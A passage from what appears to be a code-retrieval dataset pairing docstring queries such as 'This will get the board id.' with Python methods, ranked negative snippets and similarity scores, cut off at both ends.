"async def on_ready(self):\n db_guilds = set([int(k) for k in self.bot.main_repo.get_guilds().keys()])\n guilds = set(self.bot.guilds)\n\n for guild in guilds:\n\n \"\"\"GUILDS CHECK\"\"\"\n\n if guild.id not in db_guilds:\n self.bot.main_repo.create_guild(\n guild.id, guild.name, f\"{guild.owner}\"\n ) # If guild is not in DB, create it\n\n db_guild = self.bot.main_repo.get_guild(guild.id)\n\n if guild.id in db_guilds and not db_guild[\"present\"]:\n self.bot.main_repo.update_guild(guild.id, {\"present\": True})\n elif not db_guild[\"present\"]:\n continue\n\n await self.bot.utils_class.init_guild(guild)\n\n print(\"Omnitron is ready.\")\n info(\"Omnitron successfully started\")\n\n await self.bot.change_presence(\n activity=Activity(type=ActivityType.listening, name=f\"Ping me for prefix\")\n )\n\n self.bot.starting = False",
"def ready(self):\n if self.proc.stdout.readline() != \"OK\\n\":\n raise ValueError(\"Le bot {bot} n'arrive pas à se préparer\".format(bot=self.name))",
"def init_command_objects(self):\n super().init_command_objects()\n device_data = DeviceData.get_instance()\n\n args = (device_data, self.state_model, self.logger)\n\n self.register_command_object(\"SetStowMode\", SetStowMode(*args))\n self.register_command_object(\n \"SetStandbyLPMode\", SetStandbyLPMode(*args)\n )\n self.register_command_object(\"SetOperateMode\", SetOperateMode(*args))\n self.register_command_object(\"Scan\", Scan(*args))\n self.register_command_object(\"EndScan\", EndScan(*args))\n self.register_command_object(\"Configure\", Configure(*args))\n self.register_command_object(\"StartCapture\", StartCapture(*args))\n self.register_command_object(\"StopCapture\", StopCapture(*args))\n self.register_command_object(\n \"SetStandbyFPMode\", SetStandbyFPMode(*args)\n )\n self.register_command_object(\"Slew\", Slew(*args))\n self.register_command_object(\"Track\", Track(*args))\n self.register_command_object(\"StopTrack\", StopTrack(*args))\n self.register_command_object(\"Abort\", Abort(*args))\n self.register_command_object(\"Restart\", Restart(*args))\n self.register_command_object(\"ObsReset\", ObsReset(*args))",
"def is_ready(self) -> bool:\n pass",
"def allready(antReady) :\n return numNotready(antReady) == 0",
"def readCommand(self):\n while (True):\n time.sleep(1)\n # At least a package of 4 bytes (minimum)\n # [ Head | Length | Address | Data[0…N] | Check ]\n if (self._serial.inWaiting()>=4):\n # Gets only the first byte of the packet (it should be HEAD)\n packet_header = self._serial.read(1)\n if (packet_header != Ind903Packet.PACKET_HEAD):\n # the next one is the length of the packet\n packet_length_bytes = self._serial.read(1)\n packet_length = int.from_bytes(packet_length_bytes, byteorder='big')\n if (packet_length > 0):\n raw_packet = b\"\".join([packet_header, packet_length_bytes, self._serial.read(packet_length)]) \n result_packet = Ind903Packet.parsePacket(raw_packet)\n return (result_packet)",
"def is_ready(self):\n if not self.is_accessible:\n return False\n\n is_ready_cmd = '/usr/rift/bin/ssh_root {ip} -q -n -o BatchMode=yes -o StrictHostKeyChecking=no stat /var/lib/cloud/instance/boot-finished > /dev/null'\n rc = subprocess.call(is_ready_cmd.format(ip=self._ip), shell=True)\n\n logger.info(\"Checking if {} is ready\".format(self._ip))\n if rc != 0:\n return False\n\n return True",
"def cmd_handler():\n context = zmq.Context()\n\n # socket to receive commands (a subscription to ELECTION_CODE channel)\n cmd_socket = context.socket(zmq.SUB)\n cmd_socket.connect (\"tcp://%s:5556\" % SERVER_HOST)\n topicfilter = \"politiche2013\"\n cmd_socket.setsockopt(zmq.SUBSCRIBE, topicfilter)\n\n # socket to send replies\n reply_sender = context.socket(zmq.PUSH)\n reply_sender.connect(\"tcp://%s:5557\" % SERVER_HOST)\n\n # main loop\n while True:\n print \"Aye sir, unit {0} ready for your commands ...\".format(computer_id)\n # wait for a command\n string = cmd_socket.recv()\n\n # action\n print \"Message received: '%s'\" % (string,)\n\n # send reply to server\n print \"Sending reply to server\"\n reply = { 'unit' : computer_id, 'status' : 'configured'}\n reply_sender.send_json(reply)",
"def waitonautozero(pidevice, axes=None, timeout=300, predelay=0, postdelay=0, polldelay=0.1):\n if not isdeviceavailable([GCS2Commands, GCS21Commands], pidevice):\n raise TypeError('Type %s of pidevice is not supported!' % type(pidevice).__name__)\n\n axes = getaxeslist(pidevice, axes)\n if not axes:\n return\n waitonready(pidevice, timeout=timeout, predelay=predelay, polldelay=polldelay)\n maxtime = time() + timeout\n while not all(list(pidevice.qATZ(axes).values())):\n if time() > maxtime:\n raise SystemError('waitonautozero() timed out after %.1f seconds' % timeout)\n sleep(polldelay)\n sleep(postdelay)",
"def control_wait_for_ready(self) -> None:\n self.__logger.debug('Eva.control_wait_for_ready called')\n return self.__http_client.control_wait_for_ready()",
"async def _list_commands(self):\n message_cmds = \"regular commands:\\n\"\n tts_cmds = \"tts commands:\\n\"\n cur = self.conn.cursor()\n cur.execute(\n \"SELECT invoke FROM message_commands WHERE istts is true;\")\n cmd_invokes = cur.fetchall()\n for invoke in cmd_invokes:\n tts_cmds += invoke[0] + ', '\n tts_cmds = tts_cmds[0:-2]\n cur.execute(\n \"SELECT invoke FROM message_commands WHERE istts is false;\")\n cmd_invokes = cur.fetchall()\n for invoke in cmd_invokes:\n message_cmds += invoke[0] + ', '\n message_cmds = message_cmds[0:-2]\n cur.close()\n await self.bot.say(message_cmds)\n await self.bot.say(tts_cmds)"
] | [
"0.66666836",
"0.6577503",
"0.64121866",
"0.62709725",
"0.60107315",
"0.5956526",
"0.5840667",
"0.57543665",
"0.57164615",
"0.5709062",
"0.57082236",
"0.5687072",
"0.5677375",
"0.5664126",
"0.5635631",
"0.56272054",
"0.56113994",
"0.5595407",
"0.55702424",
"0.5542301",
"0.55404663",
"0.5527589",
"0.550858",
"0.5505093",
"0.5491871",
"0.5479855",
"0.5461874",
"0.54524934",
"0.5450419",
"0.54497105",
"0.544245",
"0.5426359",
"0.5414273",
"0.5412483",
"0.5411912",
"0.54113185",
"0.54079515",
"0.54049677",
"0.5403449",
"0.538727",
"0.53781366",
"0.53492546",
"0.53475034",
"0.53426677",
"0.533779",
"0.5336901",
"0.53340924",
"0.5332267",
"0.531689",
"0.52995694",
"0.52893704",
"0.52823746",
"0.52779686",
"0.5275879",
"0.5275492",
"0.5267894",
"0.52499187",
"0.52410215",
"0.52410215",
"0.52410215",
"0.52410215",
"0.5234913",
"0.52334446",
"0.52287656",
"0.522405",
"0.522405",
"0.52190423",
"0.52094823",
"0.52040076",
"0.5189371",
"0.51841056",
"0.5164193",
"0.5164043",
"0.5161925",
"0.5154653",
"0.514824",
"0.5136568",
"0.513281",
"0.5124847",
"0.5118619",
"0.51126724",
"0.510964",
"0.5107207",
"0.5099327",
"0.5090706",
"0.5083482",
"0.50755626",
"0.5067753",
"0.50661033",
"0.5060736",
"0.50521135",
"0.5050474",
"0.5050291",
"0.5047107",
"0.5044666",
"0.50309014",
"0.5030859",
"0.50169516",
"0.50101095",
"0.50100553",
"0.50094783"
] | 0.0 | -1 |
This will get the board id. | def get_board_id(self, timeout = 0):
self.get_option_from_shouter([t_var_size_Options.BOARD_ID], BP_TOOL.REQUEST_VAR)
return str(self.config_var.options[t_var_size_Options.BOARD_ID]['value'].decode("ASCII")) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"async def __board_id(self) -> str:\n url = await self.__url_with_auth(\"1/members/me/boards?fields=name\")\n boards = await (await super()._get_source_responses(url))[0].json()\n return str(first(boards, lambda board: self._parameter(\"board\") in board.values())[\"id\"])",
"def ask_for_board_id(self):\n board_id = raw_input(\"paste in board id or url: \").strip()\n m = re.search(r\"(?:https?://)?(?:trello.com)?/?b?/?([a-zA-Z]{8})/(?:.*)\", board_id)\n if m:\n board_id = m.group(1)\n return board_id",
"def get_board():\r\n try:\r\n get_board_property('BOARD')\r\n except:\r\n logging.info(\"board property not found\")\r\n return -1",
"def get_board(self):\r\n return self.board",
"def get_board(self):\n return self.board",
"def board_game_geek_id(title):\n pass",
"def get_board(self):\n pass",
"def get_board(self):\n return self._board",
"def get_board(self):\n return self._board",
"def getBoard(self):\n return self.board",
"def get_game_board(self):\n return self.board",
"def _getUID(self, board=0, bank=0, channel=0):\n return board*512 + bank*128 + channel",
"def get_board(self):\n return self._board.get_board()",
"def get_board_name(self):\n pass",
"def get_board(self):\n\n return self._board",
"def getID():",
"def getId(self):\n if self.id: return self.id\n reader = self.getReader()\n subData = reader.findSubRecord('INTV','LAND')\n (self.gridX,self.gridY) = struct.unpack('ii',subData)\n self.id = '[%d,%d]' % (self.gridX,self.gridY)\n return self.id",
"def get_seat_id(boarding_pass: str) -> int:\n row, column = parse_boarding_pass(boarding_pass)\n return row * 8 + column",
"def getID(self) -> int:\n ...",
"def _get_id(self):\n return self.id",
"def get_board(board_id):\n all_boards = [board for board in GRAPH_DB.find(\"board\")]\n board = filter(lambda b: b._id == board_id, all_boards)[0]\n return {\"ladders\": from_hackerrank_paths(board[\"ladders\"]),\n \"snakes\": from_hackerrank_paths(board[\"snakes\"])}",
"def getID(self):\n return self.__clubDbID",
"def tile_id(self):\n return self._tile_id",
"def get_id(self):\n pass",
"def get_id(self):\n pass",
"def get_id(self):\n pass",
"def get_id(self):\n pass",
"def get_id(self):\n if hasattr(self, \"_thread_id\"):\n return self._thread_id\n for id, thread in threading._active.items():\n if thread is self:\n return id",
"def get_id(self):\n if hasattr(self, \"_thread_id\"):\n return self._thread_id\n for id, thread in threading._active.items():\n if thread is self:\n return id",
"def get_winner(self, board):\r\n for p_id in self.player_ids:\r\n win_array = np.array([p_id] * self.board_width, dtype=np.int8)\r\n for i in range(self.board_width):\r\n # check rows\r\n if np.array_equal(board[i], win_array):\r\n return p_id\r\n # check columns\r\n elif np.array_equal(board[:, i], win_array):\r\n return p_id\r\n # check leading diagonal\r\n elif np.array_equal(np.diagonal(board), win_array):\r\n return p_id\r\n # check non-leading diagonal\r\n elif np.array_equal(np.diagonal(np.flipud(board)), win_array):\r\n return p_id\r\n # return nan if no wins losses or draws\r\n for i in np.nditer(board):\r\n if i == 0:\r\n return np.nan\r\n # must be a draw so return 0\r\n return 0",
"def getIdent (self) :\n return self.id",
"def get_id(self):\n\n\t\treturn self.__id",
"def get_player_id(self):\n return self.game.get_player_id()",
"def find_issue_id(self):",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def _get_id(self):\n return self.__id",
"def getId(self):\n if getattr(self,'id',None):\n return self.id\n name = self.name\n #--Singleton records \n if name in frozenset(('FMAP','GAME','JOUR','KLST','PCDT','REFR','SPLM','TES3')):\n return None\n #--Special records.\n elif name == 'CELL':\n reader = self.getReader()\n srName = reader.findSubRecord('NAME',name)\n srData = reader.findSubRecord('DATA',name)\n (flags,gridX,gridY) = struct.unpack('3i',record.data)\n if flags & 1:\n self.id = cstrip(srName)\n else:\n self.id = '[%d,%d]' % (gridX,gridY)\n elif name == 'INFO':\n srData = self.getReader().findSubRecord('INAM',name)\n self.id = cstrip(srData)\n elif name == 'LAND':\n srData = self.getReader().findSubRecord('INTV',name)\n self.id = '[%d,%d]' % struct.unpack('2i',srData)\n elif name == 'PGRD':\n reader = self.getReader()\n srData = reader.findSubRecord('DATA',name)\n srName = reader.findSubRecord('NAME',name)\n gridXY = struct.unpack('2i',srData[:8])\n if srData != (0,0) or not srName:\n self.id = '[%d,%d]' % gridXY\n else:\n self.id = cstrip(srName)\n elif name == 'SCPT':\n srData = self.getReader().findSubRecord('SCHD',name)\n self.id = cstrip(srData[:32])\n #--Most records: id in NAME record.\n else:\n srData = self.getReader().findSubRecord('NAME',name)\n self.id = srData and cstrip(srData)\n #--Done\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_id(self):\n return self.id",
"def get_board(self):\n return self.board.copy()",
"def get_id(self) -> int:\n return self.id",
"def get_id(self) -> int:\n return self.id",
"def board(self, board_id):\r\n return Board(self, board_id)",
"def _get_thread_id() -> int:\n # NOTICE:\n # we do not use threading.get_ident() to identify a thread, as Python recycles these identifiers\n return id(threading.current_thread())",
"def get_id(self):\n for id, thread in threading._active.items(): \n if thread is self: \n return id",
"def get_id(self):\n return self._column_id",
"def get_id(self):\n return self.__id",
"def get_id(self):\n return self.__id",
"def id(self):\n # Might also be a first 12-characters shortcut.\n return self._id",
"def get_game_id(self) -> str:\n return self.game_name_entry.get()",
"def get_id(self):\n \"\"\"Requires use of Python 3\"\"\"\n return str(self.id)"
] | [
"0.8467954",
"0.7145274",
"0.7045439",
"0.6920562",
"0.687995",
"0.67577267",
"0.6710416",
"0.66724986",
"0.66724986",
"0.664022",
"0.66289103",
"0.65972143",
"0.65322155",
"0.6522598",
"0.6491379",
"0.626192",
"0.62350416",
"0.6232243",
"0.62153196",
"0.61943984",
"0.6173523",
"0.6135429",
"0.6132925",
"0.61313546",
"0.61313546",
"0.61313546",
"0.61313546",
"0.6081715",
"0.6081715",
"0.6078952",
"0.60713255",
"0.60482967",
"0.6018613",
"0.60053676",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.5982985",
"0.59757555",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.5963268",
"0.59603435",
"0.5948806",
"0.5948806",
"0.5934224",
"0.5932575",
"0.5918911",
"0.5915601",
"0.5895594",
"0.5895594",
"0.58865106",
"0.588197",
"0.5875737"
] | 0.7062877 | 2 |
This will string representing the current state of the system.. | def get_state(self, timeout = 0):
self.get_option_from_shouter([t_var_size_Options.CURRENT_STATE], BP_TOOL.REQUEST_VAR)
rval = str(self.config_var.options[t_var_size_Options.CURRENT_STATE]['value'].decode("ASCII"))
return rval | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def state(self) -> str:",
"def state(self):\n\n\t\treturn str(self)",
"def stateString(self):\n return self._mdp.stateString(self._cur_state);",
"def state(self):\r\n return str(self)",
"def print_state(self):\n print('\\nthe current state is: ' + str(self.state) + '\\n')",
"def state(self):\n return str(self)",
"def str_state(self) -> str:\n value = \"Not connected\"\n if self.STARTED:\n value = \"Connected\"\n value = f\"{value} to {self.url!r}, CLIENT v{self.PKG_VERSION}, PYTHON v{self.PY_VERSION}\"\n banner = get_env_ax().get(\"AX_BANNER\")\n if banner:\n value = f\"{value} [{banner}]\"\n return value",
"def current_state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"current_state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return pulumi.get(self, \"state\")",
"def state(self) -> str:\n return self._state",
"def state(self) -> str:\n return self._state",
"def state(self) -> str:\n return self._state",
"def state(self) -> str:\n return self._state",
"def state(self) -> str:\n return self._state",
"def current_state(self) -> str:\n return self._state_storage.state",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state\")",
"def __repr__(self):\r\n r = str(self.current_instance_state())\r\n return r",
"def display_state(self):\r\n\r\n print('\\n')\r\n print('>>CURRENT STATE')\r\n ct = 0\r\n for i in self.state:\r\n for j in i:\r\n if j == -1:\r\n val = 'X'\r\n else:\r\n val = str(ct)\r\n if len(val) == 1:\r\n print(' ' + val + ' ', end='')\r\n else:\r\n print(val + ' ', end='')\r\n ct += 1\r\n print('\\n')",
"def report_state(self):\n text = \"Status: %d\"%self.state.num;\n if self.state.msg !=\"\":\n text += \", Msg: %s\"%self.state.msg;\n return text;",
"def state(self) -> str:\n return str(self.coordinator.server_status)",
"def state(self):\n\t\tif self._state in JOB_PS:\n\t\t\treturn JOB_PS[self._state]\n\t\telse:\n\t\t\treturn str(self._state)",
"def _get_status(self):\n held_msg=\"\"\n return u'%s%s' % (self.get_status_display(), held_msg)",
"def status(self):\n str = \"%s\\n\\tpv %s\\n\" % (self.name,self.pvname)\n str += \"\\tcurrent position (user,dial): %f,%f\\n\" % (self.wm(),self.wm_dial())\n str += \"\\tuser limits (low,high) : %f,%f\\n\" % (self.get_lowlim(),self.get_hilim())\n try:\n str += \"\\tpreset position : %s\" % (self.presets.state())\n except AttributeError:\n pass\n return str",
"def getState():\n # TODO: this isn't nearly as meaningful as it used to be",
"def print_state():\n global simulator\n if simulator is None:\n print \"program is not started\"\n return\n print simulator.state()",
"def print_state(self):\n\t\tprint self.time, len(self.state['s']), len(self.state['p']), len(self.state['c'])",
"def show_state(self):\n print \"I don't know how to show_state.\"",
"def silly(self) -> str:\n print(f\"Getting {self._name}'s State\")\n return self._state",
"def operational_state(self) -> str:\n return self._operational_state",
"def __str__(self):\n state_1 = \"Time: \" + str(self._time)\n state_2 = \"Current Cookies: \" + str(self._current_cookies)\n state_3 = \"CPS: \" + str(self._cps)\n state_4 = \"Total Cookies: \" + str(self._total_cookies)\n return state_1 + \" \" + state_2 + \" \" + state_3 + \" \" + state_4",
"def state(self) -> str | None:\n return self._state",
"def show_state(self):\n print(\"I don't know how to show_state.\")",
"def state_message(self) -> str:\n return pulumi.get(self, \"state_message\")",
"def state(self):\n msg = f\"Procs: {self.running_procs} / {self.procs_no}\"\n if self.gpus:\n msg += f\" | {len(self.gpus):d} GPUS:\"\n for gpu in self.gpus:\n msg += f\" {gpu}:{self.gpu_running_procs[gpu]}/{self.per_gpu[gpu]};\"\n return msg",
"def state_message(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"state_message\")",
"def __getstate__(self):\n return '1.0', self.__dict__",
"def _get_state(self):\n print(\"GET STATE\")\n res = self._send_command(\n \"RS;\",\n fb_required=True,\n res_pattern=\"STATE:\")\n # The received answer is supposed to be something like\n # STATE:0|1|-1\n state = int(res.split(':')[1])\n if state == PVDriver.IDLE:\n return \"IDLE\"\n elif state == PVDriver.MOVING:\n return \"MOVING\"\n else:\n return \"ERROR\"",
"def __str__(self):\n return ''.join(str(e) + ' ' for e in self.state)",
"def showOperState(self):\n \n deviceName = self.deviceName()\n\n if deviceName:\n state = a.sys.net.lnx.device.DeviceUtils.getOperState(self.name, self._log, deviceName) \n print \"operstate: %s\" % state",
"def state(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"state\")",
"def detail_state(self) -> str:\n if isinstance(self.wemo, CoffeeMaker):\n return self.wemo.mode_string\n if isinstance(self.wemo, Insight):\n standby_state = self.wemo.standby_state\n if standby_state == StandbyState.ON:\n return STATE_ON\n if standby_state == StandbyState.OFF:\n return STATE_OFF\n if standby_state == StandbyState.STANDBY:\n return STATE_STANDBY\n return STATE_UNKNOWN\n # Unreachable code statement.\n raise RuntimeError",
"def state(self):\n # type: () -> string_types\n return self._state",
"def info(self):\n\n if self.running:\n return INFO_RUNNING_FORMAT.format(**self.__dict__)\n else:\n return INFO_ENDED_FORMAT.format(**self.__dict__)",
"def __repr__( self ):\n\n return self.__class__.__name__ + \"( \" + repr(self.state) + \")\";",
"def session_state():\n\n return state.summary()",
"def __repr__(self):\n string = \"Current state: \\n\"\n if self.state[0] == 0: # We're on the left side\n string += \"M: \"\n string += str(self.state[1]).ljust(10)\n string += \"M: \"\n string += str(TOTAL_NO_MISSIONARIES - self.state[1]).ljust(10)\n string += \"\\n\"\n\n string += \"C: \"\n string += str(self.state[2]).ljust(10)\n string += \"C: \"\n string += str(TOTAL_NO_CANNIBALS - self.state[2]).ljust(10)\n string += \"\\n\"\n\n string += \"Boat position: left\\n\"\n else: # We're on the right side\n string += \"M: \"\n string += str(TOTAL_NO_MISSIONARIES - self.state[1]).ljust(10)\n string += \"M: \"\n string += str(self.state[1])\n string += \"\\n\"\n\n string += \"C: \"\n string += str(TOTAL_NO_CANNIBALS - self.state[2]).ljust(10)\n string += \"C: \"\n string += str(self.state[2]).ljust(10)\n string += \"\\n\"\n\n string += \"Boat position: right\\n\"\n string += \"\\n\"\n return string",
"def print_state(self):\n print(self.identifier, \n self.gender, \n self.age,\n self.sexual_activity,\n self.disease_status,\n self.time_since_infection,\n self.number_of_partners,\n self.current_partners)",
"def state(self):\n return self.get_state()",
"def log_state(self):\n rospy.loginfo(\"STATE: %s [%s]\" %(self.__class__.__name__, 15 - self.ros_node.get_time()))",
"def getState(self):\r\n return self._get_SS_State()#self.currentState\r",
"def status(self):\n return self.state",
"def current_protection_state(self) -> str:\n return pulumi.get(self, \"current_protection_state\")",
"def get_state(self):\n pass",
"def requested_state(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"requested_state\")",
"def state(self):\n return self.device.status(station=self.station_number)",
"def display_status(self) -> str:\n return pulumi.get(self, \"display_status\")",
"def current_state_time(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"current_state_time\")",
"def state(self):\n if self._state is None:\n return None\n\n if self._sensor_type in [ATTR_CYCLE1_START, ATTR_CYCLE2_START, ATTR_TIME]:\n if self._state[0] == 255:\n return \"Disabled\"\n return '{:02d}:{:02d}'.format(self._state[0], self._state[1])\n elif self._sensor_type == ATTR_STATUS:\n return STATUS_CHOICES[self._state]\n\n return self._state",
"def state(self):\n return self.status",
"def _get_status(self):\n return u'%s' % (self.get_status_display())",
"def resource_state(self) -> str:\n return pulumi.get(self, \"resource_state\")",
"def state(self) -> str | None:\n if self.zone.Power is True:\n state = self.coordinator.data.nowplaying[self.zone.SourceID].Status\n return STATUS_TO_STATES.get(state, None)\n else:\n return STATE_OFF",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")"
] | [
"0.79885036",
"0.77594405",
"0.76912963",
"0.7673117",
"0.76422006",
"0.76213574",
"0.7592605",
"0.7404585",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73807883",
"0.73284906",
"0.73284906",
"0.73284906",
"0.73284906",
"0.73284906",
"0.73095953",
"0.72859",
"0.72859",
"0.72859",
"0.72859",
"0.72859",
"0.72859",
"0.72859",
"0.72859",
"0.72859",
"0.72859",
"0.72859",
"0.72859",
"0.72716844",
"0.7234093",
"0.719929",
"0.71208906",
"0.706895",
"0.7052641",
"0.70114344",
"0.6941551",
"0.69251025",
"0.69215804",
"0.6919349",
"0.68955946",
"0.68886435",
"0.6886171",
"0.68823016",
"0.68429923",
"0.68408954",
"0.6809643",
"0.68043184",
"0.680315",
"0.6785486",
"0.6779382",
"0.67677957",
"0.6729553",
"0.66983396",
"0.66918117",
"0.66549003",
"0.66514957",
"0.6645293",
"0.66220194",
"0.6609983",
"0.66010356",
"0.6587418",
"0.65827173",
"0.6573655",
"0.6568117",
"0.6564478",
"0.6560334",
"0.65509045",
"0.6529239",
"0.6519025",
"0.6513824",
"0.6509992",
"0.6507847",
"0.6498126",
"0.64955777",
"0.6495254",
"0.6495254",
"0.6495254",
"0.6495254",
"0.6495254",
"0.6495254",
"0.6495254",
"0.6495254",
"0.6495254"
] | 0.0 | -1 |
This will ask if the shouter has reset or not. | def get_is_reset(self, timeout = 0):
response = self.send_command_to_shouter(BP_TOOL.IS_RESET)
if response == BP_TOOL.ACK:
return False
elif response == BP_TOOL.IS_RESET:
return True
else:
return False | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def reset():\n return True",
"def hasReset(self, p_int): # real signature unknown; restored from __doc__\n return False",
"def is_reset(self):\n return self._tag == 'reset'",
"def reset(self):\n\n return bool(APIConsumer.post(\"/reset\"))",
"def _allow_reset(self):\r\n return (self.child_state == self.DONE and self.child_attempts < self.max_attempts)",
"def _verify_agent_reset(self):\n if self._ia_client is None:\n return\n\n state = self._ia_client.get_agent_state()\n if state != ResourceAgentState.UNINITIALIZED:\n cmd = AgentCommand(command=ResourceAgentEvent.RESET)\n retval = self._ia_client.execute_agent(cmd)",
"def reset():\n pass",
"def reset():\n pass",
"def should_reset(self, current_time_step: ts.TimeStep) -> bool:\n handle_auto_reset = getattr(self, '_handle_auto_reset', False)\n return handle_auto_reset and np.all(current_time_step.is_last())",
"def check_allow_reset(self):\r\n if not self.ready_to_reset:\r\n if self.current_task_number > 0:\r\n last_response_data = self.get_last_response(self.current_task_number - 1)\r\n current_response_data = self.get_current_attributes(self.current_task_number)\r\n\r\n if (current_response_data['min_score_to_attempt'] > last_response_data['score']\r\n or current_response_data['max_score_to_attempt'] < last_response_data['score']):\r\n self.state = self.DONE\r\n self.ready_to_reset = True\r\n\r\n return self.ready_to_reset",
"def reset(self, system):\r\n self.change_state(self.INITIAL)\r\n return {'success': True}",
"def reset(self):\n self.stuck = False",
"def reset():\r\n pass",
"def hard_reset() -> NoReturn:",
"def reset(self):\n return self._reset",
"def reset(self):\n return self._reset",
"def soft_reset():",
"def reset_if_ready(self):\n ready = self.ready\n if ready:\n self.reset()\n return ready",
"def test_reset_computer(self):\n computer1 = computer.Computer(1)\n computer1.reset_computer()\n res = computer1.greediness == 7 and computer1.rolls == 0\n self.assertTrue(res)",
"def reset():",
"def reset():",
"def reset():",
"def _handle_reset(self):\n # reset own state\n self.grbl_version = None\n self.in_check_mode = False\n self.line_active = False\n # wait for init\n self._wait_for_grbl_init()",
"def reset(self):\n try:\n self.bus.open(self.BUS_NUMBER)\n self.write(AntennaDeployerCommand.SYSTEM_RESET, 0x00)\n self.bus.close()\n return True\n except:\n return False",
"def on_reset(self):\n pass",
